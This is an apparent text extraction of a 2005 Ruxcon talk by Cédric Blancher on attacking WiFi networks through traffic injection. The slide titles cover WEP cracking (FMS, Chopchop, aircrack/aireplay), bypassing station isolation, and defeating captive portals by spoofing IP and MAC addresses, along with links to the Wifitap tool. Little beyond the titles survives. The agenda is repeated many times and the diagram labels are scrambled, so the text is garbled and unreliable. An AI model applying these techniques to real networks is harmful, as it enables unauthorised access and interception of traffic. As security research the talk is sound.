Attacking WiFi With Traffic Injection Cedric Blancher
Attacking WiFi With Traffic Injection Cedric Blancher
Attacking WiFi With Traffic Injection Cedric Blancher
Cédric BLANCHER
[email protected] [email protected]
EADS Corporate Research Center Rstack Team
EADS/CCR/DCR/SSI http://sid.rstack.org/
Ruxcon 2005
Sydney - Australia
2005 October 1-2
http://ruxcon.org.au/
Cédric BLANCHER Attacking WiFi networks with traffic injection
Introduction
Really quick WiFi 101
Attacking WiFi networks
WPA, WPA2 and 802.11i
Conclusion
Bibliography
Agenda
1 Introduction
2 Really quick WiFi 101
WiFi injection basics
3 Attacking WiFi networks
Where’s the police - Managing management traffic
Breaking the shell - WEP cracking
All naked - Attacking stations
Let me free - Bypassing captive portals
4 WPA, WPA2 and 802.11i
5 Conclusion
6 Bibliography
Agenda
1 Introduction
2 Really quick WiFi 101
WiFi injection basics
3 Attacking WiFi networks
Where’s the police - Managing management traffic
Breaking the shell - WEP cracking
All naked - Attacking stations
Let me free - Bypassing captive portals
4 WPA, WPA2 and 802.11i
5 Conclusion
6 Bibliography
Introduction
Introduction
Of 802.11 traffic injection
Agenda
1 Introduction
2 Really quick WiFi 101
WiFi injection basics
3 Attacking WiFi networks
Where’s the police - Managing management traffic
Breaking the shell - WEP cracking
All naked - Attacking stations
Let me free - Bypassing captive portals
4 WPA, WPA2 and 802.11i
5 Conclusion
6 Bibliography
802.11 keypoints
802.11 security
1
No, it does not stand for Weak Encryption Protocol :)
Cédric BLANCHER Attacking WiFi networks with traffic injection
Introduction
Really quick WiFi 101
Attacking WiFi networks
WiFi injection basics
WPA, WPA2 and 802.11i
Conclusion
Bibliography
1 Introduction
2 Really quick WiFi 101
WiFi injection basics
3 Attacking WiFi networks
Where’s the police - Managing management traffic
Breaking the shell - WEP cracking
All naked - Attacking stations
Let me free - Bypassing captive portals
4 WPA, WPA2 and 802.11i
5 Conclusion
6 Bibliography
Toolkit
Agenda
1 Introduction
2 Really quick WiFi 101
WiFi injection basics
3 Attacking WiFi networks
Where’s the police - Managing management traffic
Breaking the shell - WEP cracking
All naked - Attacking stations
Let me free - Bypassing captive portals
4 WPA, WPA2 and 802.11i
5 Conclusion
6 Bibliography
Disclaimer :)
1 Introduction
2 Really quick WiFi 101
WiFi injection basics
3 Attacking WiFi networks
Where’s the police - Managing management traffic
Breaking the shell - WEP cracking
All naked - Attacking stations
Let me free - Bypassing captive portals
4 WPA, WPA2 and 802.11i
5 Conclusion
6 Bibliography
Management traffic
Tampering
Management traffic
Injection
Management traffic
Rogue APs (1/2)
Management traffic
Rogue AP (2/2)
Joker
1 Introduction
2 Really quick WiFi 101
WiFi injection basics
3 Attacking WiFi networks
Where’s the police - Managing management traffic
Breaking the shell - WEP cracking
All naked - Attacking stations
Let me free - Bypassing captive portals
4 WPA, WPA2 and 802.11i
5 Conclusion
6 Bibliography
WEP cracking
WEP basics
WEP cracking
Attacks overview
WEP cracking
IV collisions
WEP cracking
Cleartext attack
Authentication bypass
WEP cracking
Modified frame injection
This means you can inject arbitrary layer 2 consistent WEP frames
and have them decrypted...
Cédric BLANCHER Attacking WiFi networks with traffic injection
Introduction
Really quick WiFi 101 Where’s the police - Managing management traffic
Attacking WiFi networks Breaking the shell - WEP cracking
WPA, WPA2 and 802.11i All naked - Attacking stations
Conclusion Let me free - Bypassing captive portals
Bibliography
WEP cracking
Arbitrary injection consequences
WEP cracking
Fluhrer, Mantin and Shamir attack
WEP cracking
Korek Chopchop attack
WEP cracking
Devine aircrack/aireplay WEP cracking
WEP cracking
So WEP is weak, but still in France...
WEP cracking
And in the US ?
1 Introduction
2 Really quick WiFi 101
WiFi injection basics
3 Attacking WiFi networks
Where’s the police - Managing management traffic
Breaking the shell - WEP cracking
All naked - Attacking stations
Let me free - Bypassing captive portals
4 WPA, WPA2 and 802.11i
5 Conclusion
6 Bibliography
Attacking stations
What about associated stations ?
Attacking stations
Station to station traffic prevention (isolation)
Batman
Robin
No From-DS frame, so no
With PSPF
communicationa : stations can’t talk to
each other... To = Robin X
To-DS = 1
a
Does not work between 2 APs linked via Access Point
wired network
Robin
Attacking stations
Isolation bypass with injection
Joker
Robin
Attacking stations
Traffic tampering with injection
Tampering traffic
Quick demo...
Download Wifiping/Wifidns at
http://sid.rstack.org/index.php/Wifitap_EN
Cédric BLANCHER Attacking WiFi networks with traffic injection
Introduction
Really quick WiFi 101 Where’s the police - Managing management traffic
Attacking WiFi networks Breaking the shell - WEP cracking
WPA, WPA2 and 802.11i All naked - Attacking stations
Conclusion Let me free - Bypassing captive portals
Bibliography
Attacking stations
Full communication with injection
Attacking stations
Proof of concept : Wifitap
Attacking stations
Wifitap in short
Attacking stations
Quick demo...
Download Wifitap at
http://sid.rstack.org/index.php/Wifitap_EN
Cédric BLANCHER Attacking WiFi networks with traffic injection
Introduction
Really quick WiFi 101 Where’s the police - Managing management traffic
Attacking WiFi networks Breaking the shell - WEP cracking
WPA, WPA2 and 802.11i All naked - Attacking stations
Conclusion Let me free - Bypassing captive portals
Bibliography
1 Introduction
2 Really quick WiFi 101
WiFi injection basics
3 Attacking WiFi networks
Where’s the police - Managing management traffic
Breaking the shell - WEP cracking
All naked - Attacking stations
Let me free - Bypassing captive portals
4 WPA, WPA2 and 802.11i
5 Conclusion
6 Bibliography
Batman
Joker
Firewall
IP address Batman
sorting
Joker
spoofing
See my LSM 2002 talk[BLA02], arp-sk Joker spoofs Batman IP
Firewall
website[ARPS] or MISC3[MISC] All traffic to
Batman IP
goes to Joker
Access
ARP cache poisoning and IP Point
spoofing
Hint : IP layer and MAC layer Joker spoofs Batman MAC
_and_ IP
All traffic to
Batman IP
goes to Joker
3
Side effect : tools like arpspoof won’t work
Cédric BLANCHER Attacking WiFi networks with traffic injection
Introduction
Really quick WiFi 101 Where’s the police - Managing management traffic
Attacking WiFi networks Breaking the shell - WEP cracking
WPA, WPA2 and 802.11i All naked - Attacking stations
Conclusion Let me free - Bypassing captive portals
Bibliography
Agenda
1 Introduction
2 Really quick WiFi 101
WiFi injection basics
3 Attacking WiFi networks
Where’s the police - Managing management traffic
Breaking the shell - WEP cracking
All naked - Attacking stations
Let me free - Bypassing captive portals
4 WPA, WPA2 and 802.11i
5 Conclusion
6 Bibliography
WPA
4
Robust Security Network
Cédric BLANCHER Attacking WiFi networks with traffic injection
Introduction
Really quick WiFi 101
Attacking WiFi networks
WPA, WPA2 and 802.11i
Conclusion
Bibliography
WPA/WPA2
Some flaws already ?
So what ?
Agenda
1 Introduction
2 Really quick WiFi 101
WiFi injection basics
3 Attacking WiFi networks
Where’s the police - Managing management traffic
Breaking the shell - WEP cracking
All naked - Attacking stations
Let me free - Bypassing captive portals
4 WPA, WPA2 and 802.11i
5 Conclusion
6 Bibliography
Conclusion
What we can see
Conclusion
What we should see
Greetings to...
Agenda
1 Introduction
2 Really quick WiFi 101
WiFi injection basics
3 Attacking WiFi networks
Where’s the police - Managing management traffic
Breaking the shell - WEP cracking
All naked - Attacking stations
Let me free - Bypassing captive portals
4 WPA, WPA2 and 802.11i
5 Conclusion
6 Bibliography
Bibliography I
Bibliography II
Bibliography III
Bibliography IV
Bibliography V
Bibliography VI
Bibliography VII
Bibliography VIII
Bibliography IX
[WTAP] Wifitap,
http://sid.rstack.org/index.php/Wifitap_EN
[ISCD] ISC Handler’s Diary,
http://isc.sans.org/diary.php?date=2005-06-26